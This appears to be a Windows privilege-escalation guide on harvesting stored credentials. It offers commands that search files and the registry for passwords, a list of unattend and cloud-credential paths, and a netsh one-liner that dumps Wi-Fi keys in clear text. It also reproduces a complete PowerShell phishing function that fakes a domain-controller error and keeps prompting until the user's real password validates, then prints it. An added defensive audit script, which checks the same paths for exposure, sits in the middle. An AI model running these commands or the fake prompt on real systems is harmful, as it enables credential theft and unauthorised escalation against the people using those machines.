Low-hanging fruit such as plaintext passwords may be readable by a low-privileged user and can be abused to escalate privileges. One way to search the filesystem for such passwords is this command:
dir /b /a /s c:\ > c:\temp\c-dirs.txt
type c:\temp\c-dirs.txt | findstr /i passw
You can also replace passw with other keywords such as ssh, vnc, etc.
Unattended-installation (sysprep/unattend) files are also worth checking, as they may contain sensitive information such as passwords:
C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf
You can search for these files with:
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
Other files worth checking are:
VARIABLES.DAT
setupinfo
setupinfo.bak
web.config
SiteList.xml
.aws\credentials
.azure\accessTokens.json
.azure\azureProfile.json
gcloud\credentials.db
gcloud\legacy_credentials
gcloud\access_tokens.db
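As an added example (not from the original page), the following PowerShell audits the paths listed above from the defender's side: it reports which of them exist, which are readable by any local user, and which unattend XML files still carry a password value. It assumes it runs elevated so every ACL can be read, and that the gcloud files sit under AppData\Roaming in each profile (the page gives them relative to the gcloud config directory).

```powershell
# Added example, not from the original page: audit the unattend/sysprep paths and
# per-user cloud CLI credential files listed above. Assumes an elevated session;
# the AppData\Roaming prefix for the gcloud files is an assumption.
$SystemPaths = @(
    'C:\Windows\sysprep\sysprep.xml', 'C:\Windows\sysprep\sysprep.inf', 'C:\Windows\sysprep.inf',
    'C:\Windows\Panther\Unattended.xml', 'C:\Windows\Panther\Unattend.xml',
    'C:\Windows\Panther\Unattend\Unattend.xml', 'C:\Windows\Panther\Unattend\Unattended.xml',
    'C:\Windows\System32\Sysprep\unattend.xml', 'C:\Windows\System32\Sysprep\unattended.xml',
    'C:\unattend.txt', 'C:\unattend.inf'
)
$PerUserPaths = @(
    '.aws\credentials', '.azure\accessTokens.json', '.azure\azureProfile.json',
    'AppData\Roaming\gcloud\credentials.db', 'AppData\Roaming\gcloud\legacy_credentials',
    'AppData\Roaming\gcloud\access_tokens.db'
)
# Principals whose allowed read access means "any local user can read this" (heuristic).
$BroadPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')

function Test-BroadReadAccess([string]$Path) {
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $BroadPrincipals -contains $ace.IdentityReference.Value -and
            ($ace.FileSystemRights -band [System.Security.AccessControl.FileSystemRights]::ReadData)) {
            return $true
        }
    }
    return $false
}

function Test-UnattendPassword([string]$Path) {
    # Only XML unattend files carry <Password><Value>...</Value></Password> elements;
    # local-name() sidesteps the urn:schemas-microsoft-com:unattend namespace.
    if ($Path -notlike '*.xml') { return $false }
    try { [xml]$doc = Get-Content -LiteralPath $Path -Raw } catch { return $false }
    $values = $doc.SelectNodes('//*[local-name()="Password"]/*[local-name()="Value"]')
    return @($values | Where-Object { $_.InnerText.Trim() -ne '' }).Count -gt 0
}

$targets = $SystemPaths
foreach ($dir in Get-ChildItem -Directory 'C:\Users') {
    $targets += $PerUserPaths | ForEach-Object { Join-Path $dir.FullName $_ }
}
foreach ($p in $targets | Where-Object { Test-Path -LiteralPath $_ }) {
    $flags = @('present')
    if (Test-BroadReadAccess $p) { $flags += 'readable-by-any-user' }
    if (Test-UnattendPassword $p) { $flags += 'contains-password-value' }
    "{0}`t{1}" -f $p, ($flags -join ',')
}
```

A password stored with `<PlainText>false</PlainText>` is only base64-encoded, not encrypted, so any `contains-password-value` hit should be treated as an exposed credential and the file removed or its password element cleared.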
Passwords may also reside in the registry:
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
We can also look for VNC credentials and SSH keys (a good tool for this is SessionGopher: https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1):
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query "HKCU\Software\OpenSSH\Agent\Keys"
Wi-Fi profile passwords may also be the same as the user's web application passwords:
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
You can also simply create a credential popup and hope that the user enters their credentials into it; an implementation is below:
# POC from greg.foss[at]owasp.org
# @enigma0x3
# Adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/
# https://enigma0x3.wordpress.com/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/
function Invoke-Prompt {
    [CmdletBinding()]
    Param (
        [Switch] $ProcCreateWait,
        [String] $MsgText = 'Lost contact with the Domain Controller.',
        [String] $IconType = 'Critical',
        [String] $Title = 'ERROR - 0xA801B720'
    )
    Add-Type -AssemblyName Microsoft.VisualBasic
    Add-Type -AssemblyName System.DirectoryServices.AccountManagement
    # PrincipalContext used to validate the entered password against the local machine
    $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
    # Optional fake error message box shown before the credential prompt
    if ($MsgText -and $($MsgText -ne '')) {
        $null = [Microsoft.VisualBasic.Interaction]::MsgBox($MsgText, "OKOnly,MsgBoxSetForeground,SystemModal,$IconType", $Title)
    }
    # Pre-fill the prompt with the current user's name
    $c = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
    $credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName")
    if ($credential) {
        # Keep re-prompting until the entered password validates
        while ($DS.ValidateCredentials($c, $credential.GetNetworkCredential().password) -ne $True) {
            $credential = $Host.ui.PromptForCredential("Windows Security", "Invalid Credentials, Please try again", "$env:userdomain\$env:username", "")
        }
        "[+] Prompted credentials: -> " + $c + ":" + $credential.GetNetworkCredential().password
    }
    else {
        "[!] User closed credential prompt"
    }
}